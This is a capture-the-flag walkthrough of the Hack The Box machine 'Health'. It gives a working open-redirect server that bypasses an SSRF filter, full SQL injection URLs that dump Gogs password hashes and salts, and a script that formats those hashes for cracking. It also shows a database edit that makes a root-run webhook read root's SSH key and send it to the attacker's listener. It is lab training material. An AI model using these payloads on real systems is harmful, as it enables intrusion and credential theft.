Health - HTB - Key Points

Target's IP: 10.10.11.176


Hostname: health.htb


The site's main feature, a monitor that fetches a URL we supply and shows us the response, practically calls for SSRF, and that is indeed the case. The URL filter rejects internal targets, but the fetcher follows HTTP redirects, so we can bypass it with an open redirect on a host we control, as described on HackTricks: we submit our own server's URL, and our server answers with a 302 to the filtered target.
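The open-redirect trick above, as an added example (this is not the redirect.py used in the writeup, nor code from the box): a minimal HTTP server that answers every request with a 302 to the filtered internal URL. The default target, the Gogs port on 10.10.11.176, is taken from the writeup; the listening address and the port are assumptions.

```python
#!/usr/bin/env python3
"""Open-redirect server for bypassing an SSRF URL filter.

Usage: sudo ./redirect.py [target_url] [listen_port]
The victim validates the URL we submit (it rejects 10.10.11.176:3000)
but follows redirects, so we submit http://<our ip>:80/ and reply with
a 302 Location pointing at the filtered target.
"""
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Tuple

# Default target: the filtered Gogs port on the box, per the writeup.
DEFAULT_TARGET = "http://10.10.11.176:3000/"


def redirect_headers(target: str, status: int = 302) -> Tuple[int, List[Tuple[str, str]]]:
    """Status code and headers for a redirect to `target`.

    Kept as a pure function so the response can be checked without a socket.
    Content-Length: 0 keeps the victim's HTTP client from waiting on a body.
    """
    return status, [("Location", target), ("Content-Length", "0")]


def make_handler(target: str):
    """Build a handler class that redirects GET/POST/HEAD to `target`."""

    class RedirectHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            status, headers = redirect_headers(target)
            self.send_response(status)
            for name, value in headers:
                self.send_header(name, value)
            self.end_headers()
            # Log which path the victim requested; useful to confirm the
            # SSRF fired at all before chasing the redirected response.
            self.log_message("redirected %s -> %s", self.path, target)

        do_POST = do_HEAD = do_GET

    return RedirectHandler


def serve(target: str, port: int = 80) -> None:
    """Listen on all interfaces (assumed; bind to the VPN address if preferred)."""
    HTTPServer(("0.0.0.0", port), make_handler(target)).serve_forever()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_TARGET
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    serve(target, port)
```

Only the scheme, host and port of the submitted URL are checked by the application, so the redirect can point anywhere the victim can reach, including the loopback ports the filter was meant to protect.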

Redirecting the request to the filtered port 3000, we get back the HTML of a Gogs page. Searching for Gogs vulnerabilities turns up a known SQL injection in the /api/v1/users/search endpoint, which we can exploit through the same redirect:

python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/**/select/**/1,'1',(select/**/passwd/**/from/**/user),'1','1','1','1',1,'1',1,1,1,1,1,'1','1','1','1',1,1,'1','1',null,null,'1',1,1--/**/-OR/**/('1'='1"

This returns the password hash as a long hex string (66c...37). Running the same query against the salt column:

python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/**/select/**/1,'1',(select/**/salt/**/from/**/user),'1','1','1','1',1,'1',1,1,1,1,1,'1','1','1','1',1,1,'1','1',null,null,'1',1,1--/**/-OR/**/('1'='1"

returns the salt that goes with it.

Gogs hashes passwords with PBKDF2-HMAC-SHA256 at 10000 rounds and stores the result hex-encoded in the passwd column, so we need to rebuild the hash in the format hashcat's PBKDF2-HMAC-SHA256 mode (-m 10900) expects:

sha256:10000:base64(salt):base64(fromhex(password))
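Building that line by hand is easy to get wrong (hex vs. base64, salt as text vs. decoded bytes), so here is an added example that does the conversion and also lets you verify a single guess offline without hashcat. It is my code, not from the writeup or from Gogs; the Gogs parameters (10000 rounds, 50-byte derived key, 10-character salt) are as I read them in the Gogs source. The salt and password in the demo are constructed, not the box's values.

```python
#!/usr/bin/env python3
"""Convert a dumped Gogs user.passwd/user.salt pair into a hashcat -m 10900 line.

Gogs stores hex(pbkdf2_hmac_sha256(password, salt, 10000 rounds, 50 bytes))
in `passwd` and the raw salt string in `salt`. hashcat mode 10900 wants
    sha256:<rounds>:<base64(salt)>:<base64(digest)>
"""
import base64
import hashlib
import hmac

ROUNDS = 10000   # Gogs default iteration count
DKLEN = 50       # Gogs derives a 50-byte key, i.e. 100 hex chars in the column


def gogs_hash(password: str, salt: str) -> str:
    """Hex digest exactly as Gogs writes it into the `passwd` column."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), ROUNDS, DKLEN)
    return dk.hex()


def to_hashcat(hex_passwd: str, salt: str, rounds: int = ROUNDS) -> str:
    """sha256:rounds:base64(salt):base64(fromhex(passwd)) for `hashcat -m 10900`."""
    digest = bytes.fromhex(hex_passwd)      # the column is hex, hashcat wants base64
    return "sha256:%d:%s:%s" % (
        rounds,
        base64.b64encode(salt.encode()).decode(),   # salt is used as raw text bytes
        base64.b64encode(digest).decode(),
    )


def parse_hashcat(line: str):
    """Inverse of to_hashcat; handy for sanity-checking a line before cracking."""
    algo, rounds, b64salt, b64digest = line.split(":")
    if algo != "sha256":
        raise ValueError("not a PBKDF2-HMAC-SHA256 line")
    return int(rounds), base64.b64decode(b64salt).decode(), base64.b64decode(b64digest).hex()


def check_password(candidate: str, salt: str, hex_passwd: str) -> bool:
    """Offline check of one guess against the dumped hash (constant-time compare)."""
    return hmac.compare_digest(gogs_hash(candidate, salt), hex_passwd)


if __name__ == "__main__":
    salt = "abcdefghij"                          # constructed, 10 chars like Gogs generates
    hex_passwd = gogs_hash("Password1!", salt)   # stand-in for the dumped passwd column
    line = to_hashcat(hex_passwd, salt)
    print(line)
    # Save `line` to hashes.txt, then: hashcat -m 10900 hashes.txt rockyou.txt
    print("guess ok:", check_password("Password1!", salt, hex_passwd))
```

If hashcat rejects the line, parse it back with parse_hashcat and confirm the digest is 50 bytes and the salt decodes to the string you dumped; a salt that was accidentally hex-decoded is the usual culprit.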

Once cracked, the password is reused for SSH, so we can log in as susanne:

susanne@health:~$ cat user.txt
d5...7e

Monitoring background processes, one command run as root stands out:

CMD: UID=0    PID=5851   | /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1

This is Laravel's task scheduler, which fires the webhooks configured in the web application. Since it runs as root, every URL it fetches is fetched with root's privileges.


Enumerating the box a little further, we can retrieve the database credentials from /var/www/html/.env:


DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=laravel
DB_USERNAME=laravel
DB_PASSWORD=MYsq...014+


Webhooks created in the web app are stored in the database, and the URL filter is only enforced by the application at creation time. With direct DB access we can rewrite the monitored URL of an existing webhook to a file:// URI; the root-owned scheduler then fetches it without any check and delivers the result to the webhook endpoint we control (our listener on 10.10.14.16:443). That lets us read the filesystem as root. The modified row looks like this:

9581a098-b8cf-4a54-9d85-dd243a959fef | http://10.10.14.16:443 |         0 | file:///root/.ssh/id_rsa | * * * * * | 2022-11-17 09:40:07 | 2022-11-17 09:40:07 |


Using the file:// scheme this way, as suggested on HackTricks, we can pull root's files one by one, including the flag:
root.txt: 7a9...f5e

Merry hacking ;)
